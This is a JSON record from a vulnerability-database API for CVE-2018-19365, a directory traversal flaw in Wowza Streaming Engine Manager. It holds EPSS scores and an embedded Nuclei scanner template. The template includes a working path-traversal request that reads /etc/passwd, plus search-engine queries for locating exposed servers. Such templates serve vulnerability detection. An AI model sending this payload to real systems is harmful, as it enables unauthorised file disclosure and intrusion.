{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-19365/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-19365/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-19365/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-19365/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-19365/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-19365"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-19365"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.22292,
      "kev": false,
      "percentile": 0.97579
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2018/CVE-2018-19365.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2018-19365\n\ninfo:\n  name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal\n  author: 0x_Akoko\n  severity: critical\n  description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.\n  impact: |\n    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information.\n  remediation: |\n    Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability.\n  reference:\n    - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-19365\n    - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n    cvss-score: 9.1\n    cve-id: CVE-2018-19365\n    cwe-id: CWE-22\n    epss-score: 0.22292\n    epss-percentile: 0.97579\n    cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: wowza\n    product: streaming_engine\n    shodan-query:\n      - http.title:\"manager\" product:\"wowza streaming engine\"\n      - cpe:\"cpe:2.3:a:wowza:streaming_engine\"\n    fofa-query: title=\"manager\" product:\"wowza streaming engine\"\n    google-query: intitle:\"manager\" product:\"wowza streaming engine\"\n  tags: cve2018,cve,wowza,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100dd8c3fd2ae954857809f7b2184a66f464c60f5e930e093abe296d618645059b50220389a76be5462a602e4d2bd63ef4e0fde0c4c39fb7a25538da9bc560c34e73dc8:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2018-19365"
}